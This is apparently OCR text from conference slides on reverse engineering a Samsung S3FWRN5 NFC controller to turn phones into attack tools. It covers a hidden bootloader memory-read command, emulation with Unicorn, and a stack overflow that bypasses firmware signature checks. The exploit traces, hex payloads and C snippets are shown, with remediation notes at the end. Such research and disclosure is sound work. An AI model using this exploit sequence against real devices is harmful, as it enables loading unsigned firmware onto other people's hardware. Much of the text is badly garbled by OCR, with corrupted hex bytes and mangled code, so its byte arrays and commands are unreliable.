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Project Origin 


Smartphones contain a huge amount of closed firmware 
This limits the capabilities of even rooted devices 


By breaking firmware protections and reverse engineering embedded chipsets, 
smartphones can be used as attack tools 


Wi-Fi Monitor Mode 


Many smartphones support Wi-Fi Monitor Mode 
Activated in Snapdragon chipsets via: 

echo 4 » /sys/module/wlan/parameters/con mode 
Broadcom chipsets can utilise custom firmware 


Well known, implemented in modern mobile testing tools 


USB Device Emulation jp easi TRU 


Debugging information files (DEVELOPMENT) 

Debugging information files in debugfs (DEVELOPMENT) 
Maximum VBUS Power usage (2-500 mA) 

Number of storage pipeline buffers 


Linux Kernel supports emulating USB devices via USB Peripheral Controller ---> 


USB Gadget Drivers 
G a d get F S Gadget Zero (DEVELOPMENT) 
Audio Gadget 
UAC 1.0 (Legacy) 
Ethernet Gadget (with CDC Ethernet support) 
RNDIS support 
Ethernet Emulation Model (EEM) support 


- : Network Control Model (NCM) support 

This can be used to emulate any standard USB device DE Gadget Pilesyeten 
«M» Function Filesystem 
[*] Include configuration with CDC ECM (Ethernet) 
[*] Include configuration with RNDIS (Ethernet) 
[*] Include 'pure' configuration 

" «M» Msss Storage Gadget 
Ra rely used, but very effective «M» USB Gadget Target Fabric Module 


«M» Serial Gadget (with CDC ACM and CDC OBEX support) 
«M» MIDI Gadget 
«M» Printer Gadget 
«M» CDC Composite Device (Ethernet and ACM) 
«M» Nokia composite gadget 
«M» CDC Composite Device (ACM and mass storage) 
<> Multifunction Composite Gadget 
<M> HID Gadget 
<M> EHCI Debug Device Gadget 
EHCI Debug Device mode (serial) ---> 
<M> USB Webcam Gadget 


gadgetFile = open("/dev/gadget/musb-hdrc", O_RDWR); 


"Could not open gadget file, got response %d\n", gadgetFile); 
1; 


writeValGadget = write(gadgetFile,dumpedDescriptor, (dumpedDescriptor)); 


pthread_create(&gadgetThread,8,gadgetCfgCb, NULL); 


outEp = -1; 


(outEp « @ 


outEp - open("/dev/gadget/ep2out", O CLOEXEC | O RDWR); 


inEp = open("/dev/gadget/eplin", O CLOEXEC | O_RDWR); 


Debian Chroot 


A full Debian Root Filesystem can be generated with qemu-debootstrap 


A simple script can provide hardware access and direct SSH connectivity: 


mount -o remount,rw /data 

mount --bind /proc /data/debian arm64/proc 

mount --bind /sys /data/debian arm64/sys 

mount --bind /dev /data/debian arm64/dev 

mount devpts /data/debian arm64/dev/pts -t devpts 

chroot /data/debian arm64/ /bin/bash --login -c /usr/sbin/sshd & 


09:59 fl = NES E CAL. 


NFC On Android - Standard Functionality 


T TagInfo << p 


IC INFO NDEF EXTRA FULL SCAN 


NFC on Android is restricted to very specific features: 


Generic Reader Modes 


Mobile Payments 


NDEF Communication 


Host-Card Emulation 


NFC On Android - Unsupported Functionality 


Desired features for an NFC attack tool: 
Reader Based Attacks 
Raw Tag Emulation 


Passive Sniffing 


Target Device 


Samsung S6 - SM-G920F 
Older smartphone - readily available 
Allows for OEM unlocking and deployment of Custom ROMs 


Found to use a proprietary Samsung Semiconductor NFC 
Controller in non-US versions 


NFC Controller - SFWRN5 


NN SW ug Y MGR GF CY eee 
Ee NS ela Bee ee aS NRY 


Custom chip developed by Samsung Semiconductor 


Utilised in non-US Samsung S6, and Note 4 devices 
ES y 
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Basic Communication — Hardware On Android 


Smartphones are essentially embedded Linux devices 
GPIO and I2C communication can be performed via files in "/dev/i2c-*" and “/dev/gpio*” 
Samsung's Kernel abstracts these to custom driver, accessed using device file "/dev/sec-nfc" 


File reads, writes and IOCTLs control the chip 


NCI Communication 
NFC chips communicate via a standard protocol 
This abstracts and restricts NFC functionality, to simplify the process 
Send and receive packets consist of the following: 
GID — Byte containing identifier of functionality group (Core, RF, Vendor Specific) 
OID — Byte containing identifier of specific operation 


Length — Byte containing the length of parameters 


Payload — Data related to the operation 


NCI — Non Standard Functionality 


Vendor GID (Oxf) allows for any non-standard functionality to be implemented 
Vendor operations from Ox00-Oxff can be enumerated by checking error responses 
Vendor defined operations are most likely to contain actionable weaknesses 


In addition, configuration and mode operations allow for non-standard functionality 


{@x2F, 0x26, 0x30}, 

{0x2f, 0x22, exfd, exee, exce, ƏxJe, ƏXƏƏ, ƏXSƏ, Oxc@, 0x07, Ox4c, OX00, Oxc4, OXSf, Əxe2, @xe2, 0xe2, 0X28, 0X02, OX04, OXO0, OXOO, OxO1, 8X83, 
(0x2f, 0x22, exfd, exei, exac, exee, exee, exse, ex4e, exeo, exee, exco, Ox9e, exeo, OxS0, OxcO, 0x07, Ox4C, OX00, OXd8, 6x88, @x3c, Oxbc, exbc, 
(0x2f, 0x22, exfd, 0x02, 0x03, 0x40, 0x00, O0X81, Ox9e, OXa8, 0X50, OxSc, 0x03, 0x40, OXO0, Ox81, Ox9e, Oxas, OX50, OXSC, 0x03, 0x40, OXOO0, OXS1, 
{@x2f, 0x22, exfd, 6xe3, Oxa8, 6x38, @xOc, ƏXƏƏ, OX04, OX80, Ox42, OX01, OXC3, OX88, 0X24, OXO8, OXO0, OXOO, OXf2, OXOO, Exes, OxO3, OxOO0, Oxe0, 
(0x2f, 0x22, Oxfd, 0X04, 0x38, Ox8c, 0x03, 0X81, Ox9e, Oxa8, Ox38, OXSC, 0x03, OX81, O0x9e, Oxa8, 0X38, OXSC, 0x03, OX81, Ox9e, Oxa8, OX38, OX8C, 
{@x2f, 0x22, Əxfd, 0x05, 0X38, Ox8c, OxO3, 0X81, Ox9e, Ox48, Ox38, OxSc, OxO3, 0X81, Ox9e, Ox68, Ox38, Ox8c, 0X03, Ox81, Ox9e, 0X48, 0X38, Ox8c, 
(ex2f, 0x22, exfd, exec, exfb, exse, exce, exfb, 6x17, exee, Ox46, 6x50, exce, exfb, exs1, exbf, exeo, Ox46, 0x61, exee, exeo, exff, exeo, ex4e, 
(ex2f, 0x22, exfd, 0x07, exeo, 0x46, exse, exce, exff, @x81, 6x50, OxcO, Oxfd, 0x58, exce, exfd, ex4f, exee, ex4e, exse, exce, exfd, 0x81, exse, 
(0x2f, 0x22, exfd, 6x08, 0x00, Ox00, OxO0, OxOO, OXOO, OxOO, OXOO, OXO, OXOO, OXOO, OXOO, OxOO, OxOO, OxOO, Ox5f, Ox45, OX10, 0x00, OxO1, OX1f, 
(ex2f, 0x22, exfd, exes, exee, exea, exee, exee, exee, ex7f, 6x07, 6x20, Ox3f, exff, 06x00, 0x00, Ox, OxOO, OxOO0, OxOO, OxOO, OxOO, OxOO, OxeGe, 
(0ex2f, 0x22, exfd, exea, exie, exee, exei, exid, exi6, @x@2, exe2, exeo, exfa, exee, 06x32, 0x60, Oxeo, exeo, @xOG, OxOO0, OxO0, OxOO0, OxOO, 8x07, 
(0x2f, 0x22, exfd, exeb, exeo, exeo, exee, exeo, OxeO, OXG, OxOB, OxOO, OXOO, OXO5, OxO9, Ox46, Ox01, Ox9f, OxOO, OxOO, Ox9f, OxOO, OxOO, OXGf, 
{@x2f, 0x22, 0x21, exec, 0x00, OxE@, OXOS, OxO0, OxOO, OxOO, Ox10, OXxOO, OxOO, OXOO, 0x20, OxOO, OXOO0, OXOO, OX40, OXOO, 0x45, Ox4b, Ox41, exee, 
{@x2F, 0x25, Ox@8, Ox4b, exid, exee, exee, 86x21, 0x44, 0x45, ex46], 

(0x2f, 0x27, 0x02, 0x33, Oxf7}, 


S3FWRNS5 - Firmware Updates 


S3FWRNBS chip supports firmware updates via I2C 
Firmware updates are never implemented via NCI, a custom bootloader is used 


Loaded from firmware files are found in vendor partition 


00000000 32 30 31 35 31 31 31 38 31 32 30 34 ff ff ff ff |201511181204.... 


| 
00000010 22 00 06 02 2c 00 00 00 80 00 00 00 2c 01 00 00 |"...,....... sq 
00000020 1d 00 00 00 ac 00 00 00 380 00 00 00 10 5e 0f 31 |............. col 
00000030 le 63 31 91 10 c7 bc b4 05 4d 38 el 00 eb le e3 |.cl...... M8: | 
00000040 4f 6f 75 3c 86 09 82 41 42 eb 7c cb 10 11 7b 24 |Oou<...AB.|...{$| 


00000050 dc 58 ab 72 f8 a8 78 6e 8c 16 6a a8 06 dO b6 ec |.X.r..xn..j..... | 
00000060 $805 3f c6 82 f1 7a 85 68 21 d3 31 fd 55 51 dc 083 0] eee eee 
00000070 85 dl a0 12 bf ca 06 Ob be 5b ad 75 d4 74 dd d2 |......... [zu t2 
00000080 40 82 80 6c 4f 68 44 90 41 69 ca dO 13 e8 2a 1c | 
00000090 78 f8 87 08 80 f7 30 5f a9 2b 5b e9 45 76 c3 de | E 
000000a0 a2 31 75 40 76 2e 9f 3f 3d 3b f1 f5 91 20 6f 65 ].1uQv..?-;... oe 

| 

| 

| 


| 
| 
| 
| 
| 
| 
Ii d cU 
| 
| 
| 
| 
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000000b0 el eb dO 54 22 f4 7c 96 fa 4a f7 41 64 5a 46 97 ESSI TTJTAGdZE 
000000cO e9 88 fl bO 37 eb 1c a2 el 54 16 63 e3 55 12 Oa 

000000d0 de 8d 80 58 07 07 bf cl 4e 9c bf f1 17 09 4b 8e one esos: K. 
000000e0 ff f4 13 8c 9d 1d 32 af 49 8c 9a 4a bf 63 22 11 |...... r a E 
000000fO0 c7 6a 89 e2 1f d7 10 24 a4 6a 4e 65 5a 35 bO 12 |.j..... $.jNeZ5.. 
00000100 43 6e 7b 3a db 76 54 69 f7 a5 3c df e8 50 9e 62 |Cn{:. VETE 
8980800110 ac 9e 97 61 1f 67 el dc 91 15 a6 64 cl le e9 Ga |... ag... diis 
80000120 98 66 42 bd f8 a5 48 ed dB 1d a? 1d TE TETE ne) EBORE | 
88808130 22 88 66 82 Be ff ff ff —21:380BBLBBLBBELSBIBBUBH NT E 18-2872] 


88060140 ff ff ff ff ff ff ff ff ff E ie hh Bd ABIBBEUTSNMI Hise) 


££ Pathes 

i£ F/W Image 
# for single SKU 

Fw DIR, PATH-" /system/vendor /f1rmware/nfc/" 


Enabling Debug Mode 


a fe configs can be modified in /system/ FW FILE NAME-"sec s3fwrn5p firmware.bin" 
££ Reg file 
# for single SKU 


RF_DIR_PATH="/system/etc/nfc/" 
. RF FILE NAME-"sec s3fwrn5p rfreg.bin" 
Debug and forced firmware updates can be enabled nn 
££ Power driver 
POWER. DRIVER-" /dev/sec-nfc" 
## Transport driver 
TRANS DRIVER-"/dev/sec-nfc" 
Traces can be pulled from Logcat 


only err, 1: and debug, ?: 
(0: not display, 1: simply 


———— —À— — — — ——— ———— ———À — 
Mu Mu Dua ua ua ua ua ua dua ua rua ua ua Mua ua a a a da dua da d a 


F/W download Option 

O : Download for different version 
1 

2 

T 


——— — 


— 
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: Download for upper version 
: Force Download 
| UPDATE MODE-O 


€— 
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Fw CFG CLK | TYPE- OxOL 
Fw CFG CLK SPEED-OxFF 
Fw CFG CLK REQ-OxFF 


Analysis Of Firmware Update Protocol 


Update traces can be pulled from Logcat 
Utilises four byte header followed by payload: 
0x00: Command type 
0x01: Command 
Ox02-0x03: Payload size 


0x04-0x100: Payload data 


0x80 is added to first byte on alternating sends 


Send( 4) 00 01 00 00 
Recv( 16) 81 00 Oc 00 
Send( 8) 80 02 04 00 
Recv( 4) 01 00 00 00 
Send( 24) 02 00 14 00 
Recv( 4) 81 00 00 00 
Send(132) 82 00 80 00 
f4 13 8c 9d 1d 32 af 49 
e9 Qa 98 66 42 bd f8 a5 
Recv( 4) 01 00 00 00 
Send( 8) 00 04 04 00 
Recv( 4) 81 00 00 00 
Send(258) 82 00 00 01 
20 00 20 b1 30 00 00 83 
64 1c 6d 1c 76 1e f9 d2 
bd 10 b5 00 fO f4 f8 10 
lb 04 9a 43 Oa 60 Oa 68 
Recv( 4) 01 00 00 00 
Send(258) 02 00 00 01 
f7 do ff 00 fO 10 fb 10 
c7 07 ff Of 72 b6 00 21 
42 02 d9 c4 48 00 fO 42 
12 04 00 02 10 18 08 18 
Recv( 4) 81 00 00 00 
Send(258) 82 00 00 01 
28 19 d1 00 fO b6 fa 06 
06 46 00 fO 66 fa 00 fO 
48 1b fO 48 fa 8d 49 8e 
00 fO b7 f9 ff f7 24 ff 
Recv( 4) 01 00 00 00 
Send(258) 02 00 00 01 
4f 65 4c 05 25 00 98 cO 
00 fO b8 f9 01 20 04 fO 
e7 04 fO 68 fb 01 20 18 
7c f9 01 20 00 fO 62 f9 
Recv( 4) 81 00 00 00 
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Firmware Update Files 


Firmware and configs can be found in Android Filesystem 

Depending on device version, can be in main system image or hidden Vendor partition 

Usually available from publicly available Android images 
./system/etc/nfc/THL/sec s3fwrn5p rfreg.b1in 
./system/etc/nfc/sec s3fwrn5p rfreg.bin 


./system/vendor/f1irmware/nfc/sec s3fwrn5p firmware.bin 
./system/vendor /fF1rmware/sec s3fwrn5p firmware.b1in 


S3FWRN5 Firmware File Analysis 


Basic format: metadata, signature, and full firmware 


Payload provides size information about internal memory of device 


00000000 ff ff ff ff |281512481204....] 
00000010 22 00 06 02 2c 00 00 00 380 00 00 00 2c 01 00 00 |"...,....... sx 
00000020 Pee oe Sr 
00000030 Be Or M8..... | 
00000040 |Oou<...AB.|...{$| 
00000050 Sree ire ree | 
00000060 Beery Du. Fo deus 
00000070 TIPS Me ETRAS 
00000080 |Q. .lOhD.Ai....*.| 
00000090 Pom 0 .+[.Ev..| 
000000a0 |.lu@v..?=;... oe| 
000000b0 I: T5. rere lee Ps | 
000000c0 TENUIT 
000000d0 Pr UMS D K. | 
00000060 ETT raa E 
000000f0 En T $.jNeZ5..| 
00000100 lente VTL QUE ROS 
00000110 Rh NE EI d | 
00000120 P8 66 42 bd f8 a5 48 ed d8 ld a7 ldjff ff ff ff |.fB...H......... | 
68000130 p2 80 66 62 Ge ff ff ff 21 38 08 66 80 38 88 808] |"....... IB... B..] 
00009140 Bee Hi 


Firmware Update Files — Identifying Architecture 


Simple mnemonics can be used to identify chip $ strings sec_s3fwrns_firmare_modded_notes.bin | grep po 
B pop 
architectures em 


4 


Th umb’s “BX LR” c 


3H@0@zpG1H@0 
zpG/H@0 
zpG-H`0 
)OpG$H'O 
-OpG 
IHapG 


Implementing Firmware Updates bidder iet dat[256] = (0x00,0x01,0x00,0x00) ; 


unsigned char ndat[65536] = (0x00,0x01,0x00,0x00) ; 


printf("F: XdXn",f); 


Dump the Firmware Update protocol command 
int wRet; 
sequence wRet = 03 


onOff = @; 

ret = ioctl(f, SEC NFC SET MODE, SEC NFC MODE OFF); 

ret = ioctl(f, SEC NFC SET MODE, SEC NFC MODE BOOTLOADER) ; 
printf("IOCTL RET: %d\n",ret); 


ioctl(f, SEC NFC WAKEUP, 1); 


Send dumped IOCTL and commands in | 
wRet - writeData(f,dat,4); 
sequence printf("Write ret: %d\n",wRet); 


receiveData(ndat); 


void performFirmwareUpdate() { 


unsigned char ndat[65536] = (0x00,0x01,0x00,0x00); 


Compare received values for each command uint8 t dat2[] = (0x80, 0x02, 0x04, 0x00, 0x14, 0x00, 0x80, 0x00 }; 


int wRet = writeData(f,dat2,sizeof(dat2)); 
printf("Write ret: %d\n",wRet); 
receiveData(ndat); 


uint8 t shal[] = (0x02, 0x00, 0x14, 0x00, 0x85, @x2a, 0xa7, @xa2, Ox3b, 0x38, Oxf0, Oxea, 0x47, Ox 


wRet = writeData(f,shal,sizeof(shal)); 


Header files from Open Source Kernel drivers 
can aid this: “sec_nfc.h” receiveDeta(ndst); 


uint8 t signature[] = {@x82, 0x00, 0x80, 0x00, 0x91, 0x20, Ox6f, @x65, Oxel, Oxeb, Oxd@, @x54, 0x2 


wRet = writeData(f,signature, sizeof(signature)); 
printf("Write ret: %d\n",wRet); 
receiveData(ndat); 

int rf = open("s3fwrn5 fw.bin",0 RDONLY); 


Firmware Update Protocol and Sequence 


Utilises numbered commands for firmware updates: 
0: Reset 

1: Boot Info 

2: Begin Update 


4: Update Sector 
5: Complete Update 


A numbered command is missing from the sequence 


This heavily implied additional hidden commands 


#define S3FWRNS FW CMD RESET 


#define S3FWRNS FW CMD GET BOOTINFO 


struct s3fwrn5 fw cmd get bootinfo rsp { 


..u8 hw version[4]; 


__ul6 sector size; 


. ul6 frame max size; 


__ul6 hw buffer size; 


define S3FWRNS FW CMD ENTER UPDATE MODE 


struct s3fwrn5 fw cmd enter updatemode { 


__ul6 hashcode size; 


. ul6 signature size; 


define S3FWRNS FW CMD UPDATE SECTOR 


struct s3fwrn5 fw cmd update sector { 


. Uu32 base address; 


#define S3FWRNS FW CMD COMPLETE UPDATE MODE 


Identifying Hidden Bootloader Commands 


Commands only work at certain stages of update process 
Chip returns error 2 if command is not valid at that stage 
Chip returns error 9 if the payload is too small 


This can be brute forced through the firmware update protocol 


Hidden Bootloader Command 3 


Same functionality as command 4 
Writes 512-byte blocks instead of 4096 


No actionable weaknesses 


Hidden Bootloader Command 6 


Takes eight bytes of parameters, two 32-bit values 


Individual bits were set in parameters and responses 
were checked 


Testing showed this allowed for reading of arbitrary 
memory — address and size 


This allows for dumping of RAM, the firmware and the 
secure bootloader 


: 80 06 08 
: 01 00 08 
00000000: 
: 00 06 08 
: 81 00 08 
00000008: 
: 80 06 08 
: 01 00 08 
00000010: 
: 00 06 08 
: 81 00 08 
00000018: 
: 80 06 08 
: 01 00 08 
00000020: 
: 00 06 08 
: 81 00 08 
00000028: 
: 80 06 08 
: 01 00 08 
00000030: 
: 00 06 08 
: 81 00 08 
00000038: 
: 80 06 08 
: 01 00 08 


00 00 00 00 00 02 00 00 00 
00 00 20 00 20 bd 02 00 600 
00 20 00 20 bd 02 00 00 
00 08 00 00 00 02 00 00 00 
00 a9 01 00 00 af 01 00 600 
a9 01 00 00 af 01 00 00 
00 10 00 00 00 02 00 00 600 
00 b7 01 00 00 bf 01 00 600 
b7 01 00 00 bf 01 00 00 
00 18 00 00 00 02 00 00 600 
00 c7 01 00 00 c7 02 00 00 
c7 01 00 00 c7 02 00 00 
00 20 00 00 00 02 00 00 600 
00 c7 02 00 00 c7 02 00 00 
c7 02 00 00 c7 02 00 00 
00 28 00 00 00 02 00 00 00 
00 c7 02 00 00 cf 01 00 600 
c7 02 00 00 cf 01 00 00 
00 30 00 00 00 02 00 00 600 
00 d5 01 00 00 c7 02 00 600 
d5 01 00 00 c7 02 00 00 
00 38 00 00 00 02 00 00 600 
00 db 01 00 00 el 01 00 00 
db 01 00 00 el 01 00 00 
00 40 00 00 00 02 00 00 600 
00 e9 01 00 00 ef 01 00 00 


Dumping The Bootloader 


Memory can be stitched from hidden 
command 6 


This showed a standard Cortex-M firmware 
format starting at address 0x00000000 (vector 
table followed by code), with a size of 8KB 


This allowed for static analysis and emulation 


The firmware contained no strings, drastically 
increasing time to analyse 


00000000 
00000010 
00000020 
00000030 
00000040 
00000050 
00000060 
00000070 
00000080 
00000090 
000000a0 
000000b0 
000000c0 
000000d0 
00000060 
000000f0 
00000100 
00000110 
00000120 
00000130 
00000140 
00000150 
00000160 
00000170 
00000180 
00000190 
000001a0 
000001b0 
000001c0 
000001d0 
000001e0 
000001f0 


00 20 00 20 bd 02 00 00 
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Analysing Bootloader Binary 


Loaded into IDA as ARM Little-endian 
Memory Layout: 


0x00000000 - Flash Memory 

Ox20000000 — RAM 

0x40000000/0x50000000 - Hardware Peripherals 
OxEO000000 - System 


eo» Disassembly memory organization 


RAM 
Create RAM section 


RAM start address 0x20000000 


RAM size 


ROM 
Create ROM section 


ROM start address 


ROM size 


Input file 


Loading address 
File offset 
Loading size 0x3000 
Additional binary files can be loaded into the database using the 
"File, Load file, Addtional binary file" command. 


OK Cancel 


Analysing Bootloader Binary 


4: 000002BC 


| 2Bt ; CODE XREF: sub 19BC44Clp 
4:000002BC R 0, -0x20002000 

M:000002BE R 

4:000002C2 

4:000002C4 


3 CODE XREF: ROM:loc 2C61j 


:000002C6 
00002C6 


, 0, 0, 0 


AB e 
0000330 
4:00000330 ; 

4:00000330 


; CODE XREF: sub 14C:loc 1681p 
3; DATA XREF: sub 14C:loc 16610 ... 


4:00000330 
4:000003308 
4:00000332 
4:00000336 
090000338 
0000033A 
:0000033C 


4:0000034C 


Bootloader Artefacts 


On start-up, the bootloader checks for a magic 
number at address 0x3000: 


Ox5AFOOFA5 


This magic number is only written if the 
signature is valid during upgrade 


Attempts to manually write the value were 
unsuccessful — first block must start with 
OxFFFFFFFF 


Re, «(sub 33041) 


REF: sub 14C+ETj 


Bootloader Artefacts 


Bootloader commands can be swiftly identified for analysis 


) h3 j } 
pà 
ry ; 


) h3 CO 


Li» 
: i 
c 13 
du 


Bootloader Artefacts 


RSA Public Key can be found in memory 


0x80 high entropy bytes followed by "00 01 00 01" — 65537 as exponent 


DOOO1da0 80 OO O4 OO a5 Ge 4a Oe 70 10 17 58 9a 51 87 dc | 


DOO01da0 80 00 04 00 a» Ge 4a Oe 70 10 17 58 9a 51 87 dc |..... nJ.p..X.DQ.. 
00001db0 


E 


v 
A 


-"DOOO01ddO 
DOO01deO0 


DOOO1 eO00 
DOODTe10 
DOO01ez20 


Identifying Memory Corruption 


Fuzzing any embedded firmware could irreparably damage the chip 
Only one phone was available for testing 
Debugging and analysis via I2C would be difficult 


Emulation of the bootloader was attempted 


Emulating Embedded Firmware With Unicorn Engine 


Library for emulating architectures and hooking all functionality 


Can define architecture, memory mapping, and hardware integration 


err - uc open(UC ARCH ARM, UC MODE THUMB, &uc); 

if (err !- UC ERR OK) { 
printf("Failed on uc open() with error returned: %u\n", err); 
return -1; 


} 


if (uc hook add(uc, &trace2, UC HOOK CODE, hook code, NULL, 1, 0) != UC ERR OK || 
uc hook add(uc, &trace1, 
UC HOOK MEM INVALID, 
hook mem invalid, NULL, 1, 0) !- UC ERR OK 


uc hook add(uc, &trace1, 

UC HOOK MEM VALID, 

hook mem valid, NULL, 1, 0) !- UC ERR OK 
I| 
uc_hook_add(uc, &trace1, 

UC HOOK MEM READ, 

hook mem read, NULL, 1, 0) !- UC ERR OK 


Emulating Embedded Firmware With Unicorn Engine 


Bootloader was loaded at address 0x00000000 
Program Counter was set to value in reset vector (0x000002BD) 


Memory was mapped for flash, RAM and hardware registers 


uc mem map(uc, 0x0, 0x3000, UC PROT ALL); 
uc mem map(uc, 0x3000, 0x1000, UC PROT ALL); 
uc mem map(uc, 0x00400000, 0x2000, UC PROT ALL); 


uc mem map(uc, 0x20000000, 0x2000, UC PROT ALL); 

uc mem map(uc, 0x40000000, 0x40000, UC PROT ALL); 
uc mem map(uc, 0x50000000, 0x40000, UC PROT ALL); 
uc mem map(uc, 0xe0000000, 0x40000, UC PROT ALL); 


Emulating Embedded Firmware With Unicorn Engine 


Commands are received in infinite loop in main thread, with no interrupts 


This meant that emulation would be a simpler task 


Emulating Embedded Firmware With Unicorn Engine 


Execution was found to cause device resets when 
accessing hardware registers during configuration 


The bootloader image was patched to bypass hardware 
initialisation 


Static hardware register values were dumped from the 
chip and loaded into Unicorn 


Emulating Embedded Firmware With Unicorn Engine 


The firmware was allowed to run, until it hit a hardware 
register 


This was a read at address 0x40022030 


static bool hook mem read(uc engine *uc, uc mem type type, 
uint64 t addr, int size, int64 t value, void *user data) 


{ 


uint8 t mems[4]; 


The disassembly showed specific bits were checked ME 


if(addr == 0x40022030) { 


memcpy(mems ,&firstVal,4); 
firstVal = rand(); 
uc mem write(uc, addr, mems, 4); 


This implied it was a status register for I2C } 


The read was overridden to return random data 


Emulating Embedded Firmware With Unicorn Engine 


if(addr == 0x40022038) { 
mems[@] = 0x90; 


Next, the firmware continually read bytes from a ee 
single address - 0x40022038 mens[3] = 6x00; 


if(memBusInc«memBusSize) { 
memcpy (mems , &memBus [memBusInc],4); 
memBusInc++; 
if(memBusInc >= memBusSize) { 


goToNextCommand(); 
This implied it was the I2C FIFO buffer een 
printf("DONE An"); 


uc mem write(uc, addr, mems, 4); 
printf("Reading to X08x X02x X02x X02x X02xXn",addr,mems[9],mems[1],mems[2],mems[3]); 


: . : } 
Firmware update commands were sent via this 
register 
if(addr == 8x488228034) { 
printf("Writing to X88x €82xXn",addr,mems[8]); 
processRecv(mems[8]); 
Responses to commands were sent to address } 
0x40022034 


This constituted full emulation of the I2C 
communication 


Memory Corruption Opportunities 


Randomised fuzzing would now be viable 
Commands have 16-bit sizes — larger than entire contents of RAM 
Some commands send additional data in chunks 


Size of hash and signature are defined in initialisation command 


[8x80, 8x02, 8xO4, GxO0, Gx14, OxOO, GxS8, GxOGD) 


Bypassing Signature Checks 


Manipulation of the hash and signature sizes allowed for more data to be sent in chunks 


Analysis in Unicorn showed that this caused out of bounds memory access 


Further analysis showed that this overwrote the stack 


Reading to 40022038 00 OO OO OO 


Hook code: OOOO00f68 2 - rü 00000078 00000000 fffffdfe 
Hook code: OO0000f6a 2 - rO 00000078 00000000 fffffdfe 
Hook code: OOO000f6c 2 - rO 00000078 00000000 fffffdfe 
Hook code: OO000f6e 2 - rO 00000077 00000000 fffffdfe 
Hook code: OO0000f66 2 - rO 00000077 00000000 fffffdfe 


Reading to 40022038 ed 00 OO 00 
Hook code: OOO000f68 2 - rO 00000077 OO0000ed fffffdfe 
Trying to access invalid mem: 20002000 PC: OODOO0f68 


000003f7 00000000 
000003f7 00000000 
000003f7 00000000 
000003f7 00000000 
000003f7 00000000 


000003f;7 00000000 


20001fff 40022000 
20001fff 40022000 
20002000 40022000 
20002000 40022000 
20002000 40022000 


20002000 40022000 


Bypassing Signature Checks 


Overwriting the stack allowed for 
manipulation of Program Counter 


SCOOO chipsets cannot execute from RAM 
Stack was too small for complex ROP exploits 


Program Counter was set to just after 
signature check: 


OxO16d (PC + 1 for Thumb code) 


loc 166 


loc 168 


loc 16C 


loc 16C 


RO, -(sub 33041) 


RO ; 
{R4,PC} 


Bypassing Signature Checks 


The exploit was performed on the physical 
chip 


This booted the main firmware without 
power cycling 


WR: 80 02 04 00 94 02 80 00 

RD: 01 00 00 00 

WR: 02 00 14 00 85 2a a7 a2 3b 38 fO ea 47 8e eb OF 2e 79 29 96 3f 6e 5d 03 
RD: 81 00 00 00 

WR: 82 00 80 00 91 20 6f 65 el eb dO 54 22 f4 7c 96 fa 4a f7 41 64 5a 46 97 € 
6e 7b 3a db 76 54 09 f7 aS 3c df e8 50 9e 02 ac 9e 97 61 1f 67 el dc 91 15 at 
RD: 01 00 00 00 

WR: 02 00 00 01 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 « 
15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 OC 
O ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 OO ed 15 00 00 ed 15 00 OO ed 
RD: 81 00 00 00 

WR: 82 00 00 Oi ed 15 00 OO ed 15 00 00 ed 15 00 00 ed 15 00 OO ed 15 00 00 € 
15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 OC 
O ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 
RD: 01 00 00 OO 

"WR: 02 00 80 00 40 f2 00 37 07 f1 31 07 38 47 f8 51 01 f1 74 O1 4f fO O1 02 £ 


15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 ed 15 00 00 c4 00 oc 
"RD: 81 05 00 00 l 


Starting unsigned firmware 
ff ff 


10 01 


02 Oe 02 00 03 01 02 03 02 00 O1 ff 10 oofee aa bb cc dd] 
10 02 40 00 00 00 00 00 00 00 OO 00 OO 00 OO 00 OO 00 OO OO C 


Bypassing Signature Checks — Remediation Methods 


Method 1: 

Patch the bootloader from the main firmware, removing the buffer overflow 
This could brick the chip, as the core bootloader would be overwritten 
Method 2: 

Patch the Kernel to disallow large hashes and signatures 


Trivially bypassed by kernel modification or direct I2C access 


Further Research - Samsung Semiconductor NFC Chips 


Multiple NFC chips outlined on company website 


Interface Product Status 


L] Samples Available 


O Mass Production 


Part Number v Core Interface v ry Product Status v 
S3NRN74 SC000 14K 3 SWP IC, SPI NFC Samples Available 
3 SWP PC NFC Mass Production 


3 SWP IC, SPI NFC Mass Production 


Mass Production 


samsung Semiconductor NFC Chips - Identification In Phones 


SamMobile.com / Firmware / Search Results 


Device specifications do not always contain NFC 
chipsets 


YOU SEARCHED FOR "G960F" 


Galaxy S9 (SM-G960F) 
It is more accurate to identify the firmwa re G960FXXS9DTD7/G960FOLE9DTD7 (Indonesia - XID) 
filenames in Android images 


G960FXXU8DTC5/G960FOPT8DTE1 (Portugal (Optimus) - OPT) 
G960FXXS9DTD7/G960FOVF9DTD7 (Austria (A1) - MOB) 


G960FXXS9DTD7/G960FOGC9DTD7 (Poland (Orange) - OPV) 


Android images can be downloaded directly from 
on | j nea rch ives G960FXXS9DTD7/G960FOGC9DTD7 (Slovakia - ORS) 


G960FXXS9DTD7/G960FOGC9DTD7 (Romania (Orange) - ORO) 


G960FXXS9DTD7/G960FOGC9DTD7 (Spain (Orange) - AMO) 


The /vendor directory contains these firmware files G960FXXS9DTD7/G960FOGC9DTD7 (France (Orange) - FTM) 


G960FXXS9DTD7/G960FOXM9DTD7 (Ukraine (Kyivstar) - SEK) 


Occasion a | ly th is is ase pa rate pa rtitio n G960FXXS9DTD7/G960FOXM9DTD7 (Caucasus Countries - CAU) 
J 


G960FXXS9DTD7/G960FOXM9DTD7 (Russia - SER) 


Samsung Semiconductor NFC Chips - Identification In Phones 


The /vendor directory always contains these firmware files 


Occasionally, this is a separate partition 


rootfs on / type rootfs (ro,seclabel,s1ze-1627532k,nr 1inodes-406883) 
tmpfs on /dev type tmpfs (rw,seclabel,nosuid,relatime,mode-755) 
devpts on /dev/pts type devpts (rw,seclabel,relatime,mode-600,ptmxmode-000) 
proc on /proc type proc (rw,relatime,gid=3009, hidepid=?) 
sysfs on /sys type sysfs (rw,seclabel,relatime) 
selinuxfs on /sys/fs/selinux type selinuxfs (rw,relatime) 
